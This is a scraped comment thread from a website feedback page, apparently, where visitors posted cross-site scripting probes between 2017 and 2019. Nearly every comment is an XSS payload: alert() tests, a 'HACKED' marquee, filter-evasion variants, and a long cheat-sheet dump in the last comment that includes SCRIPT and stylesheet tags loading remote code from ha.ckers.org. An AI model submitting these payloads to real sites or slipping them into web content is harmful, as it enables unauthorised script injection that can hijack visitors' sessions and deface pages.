12 comments

Add a comment…

Sign in

prestine

Your name

Your email address

(thinking…)

Password

Sign in with: Facebook Google

Forgot password?

Create a password

I agree to the terms of service

Signed in as (Sign out)

Close

Close

Post comment Submitting...

• mental commented  ·  June 12, 2019 09:37  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <marquee>HACKED</marquee>

  Save Submitting...
• Anonymous commented  ·  April 06, 2019 05:46  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <wittyjoke>somebody didn't get their money from finding XSS bugs on Apr 29 2017!</wittyjoke>

  Save Submitting...
• [Deleted User] commented  ·  March 10, 2019 09:32  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <img/src=="x onerror=alert(1)//">
  <div/style=="x onclick=alert(1)//">XSS'OR
  <div style=behavior:url(" onclick=alert(1)//">XSS'OR
  <div style=x:x(" onclick=alert(1)//">XSS'OR

  Save Submitting...
• [Deleted User] commented  ·  March 10, 2019 08:03  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
  <body onload=alert(/XSS/.source)>
  <input autofocus onfocus=alert(1)>
  <select autofocus onfocus=alert(1)>
  <textarea autofocus onfocus=alert(1)>
  <keygen autofocus onfocus=alert(1)>
  <video/poster/onerror=alert(1)>
  <video><source onerror="javascript:alert(1)">
  <video src=_ onloadstart="alert(1)">
  <details/open/ontoggle="alert`1`">
  <audio src onloadstart=alert(1)>
  <marquee onstart=alert(1)>

  <input type="hidden" name="redacted" value="default" injection="xss" />

  <iframe src=two.html>

  <input type=hidden style=x:expression(alert(1))>

  <input type="hidden" accesskey="X" onclick="alert(1)">

  <input type="hidden" name="redacted" value="default" injection="xss" />

  <input type="hidden" accesskey="X" onclick="alert(1)">

  <input type="hidden" name="date" value=""/> <script>alert('0');</script>" />

  <input type="text" accesskey="X" onclick="alert(1)">

  <input type="hidden" accesskey="X" onclick="alert(1)">

  Save Submitting...
• Anonymous commented  ·  February 20, 2019 12:51  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <SCRIPT>alert('1')</SCRIPT>

  Save Submitting...
• a commented  ·  February 14, 2019 05:08  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <script>alert(123)</script>
  <script>alert("hellox worldss");</script>
  javascript:alert("hellox worldss")
  <img src="javascript:alert('XSS');">
  <img src=javascript:alert(&quot;XSS&quot;)>

  Save Submitting...
• Anonymous commented  ·  June 13, 2018 11:23  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <script>alert('ltltl');</script>

  Save Submitting...
• Anonymous commented  ·  May 29, 2018 23:37  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <i>yoursiteisamazing</i>

  Save Submitting...
• Anonymous commented  ·  April 28, 2018 14:45  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <script>alert(123)</script>
  <script>alert("hellox worldss");</script>
  javascript:alert("hellox worldss")
  <img src="javascript:alert('XSS');">
  <img src=javascript:alert(&quot;XSS&quot;)>

  Save Submitting...
• <script>alert(1234)</script> commented  ·  April 27, 2018 00:28  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <script>alert(1234)</script>

  Save Submitting...
• aaa commented  ·  October 29, 2017 21:21  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  <script>alert(1234)</script>

  Save Submitting...
• <script>alert(123)</script> <script>alert("hellox worldss");</script> javascript:alert("hellox world commented  ·  April 29, 2017 02:45  ·  Flag as inappropriateFlag as inappropriate  ·  Edit…  ·  Delete…

  +YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  <<SCRIPT>alert("XSS");//<</SCRIPT>
  <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  <script>alert("XSS");</script>&search=1
  0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  <h1><font color=blue>hellox worldss</h1>
  <BODY ONLOAD=alert('hellox worldss')>
  <input onfocus=write(XSS) autofocus>
  <input onblur=write(XSS) autofocus><input autofocus>
  <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  <form><button formaction="javascript:alert(XSS)">lol
  <!--<img src="--><img src=x onerror=alert(XSS)//">
  <![><img src="]><img src=x onerror=alert(XSS)//">
  <style><img src="</style><img src=x onerror=alert(XSS)//">
  <? foo="><script>alert(1)</script>">
  <! foo="><script>alert(1)</script>">
  </ foo="><script>alert(1)</script>">
  <? foo="><x foo='?><script>alert(1)</script>'>">
  <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
  <% foo><x foo="%><script>alert(123)</script>">
  <div style="font-family:'foo&#10;;color:red;';">LOL
  LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  <script>({0:#0=alert/#0#/#0#(0)})</script>
  <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  \\";alert('XSS');//
  &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
  &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
  &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  &lt;BODY ONLOAD=alert('XSS')&gt;
  &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
  &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
  &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
  &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
  &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
  &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
  &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
  &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
  &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
  &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
  &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
  &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
  &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
  žscriptualert(EXSSE)ž/scriptu
  &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
  &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
  &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"

  Save Submitting...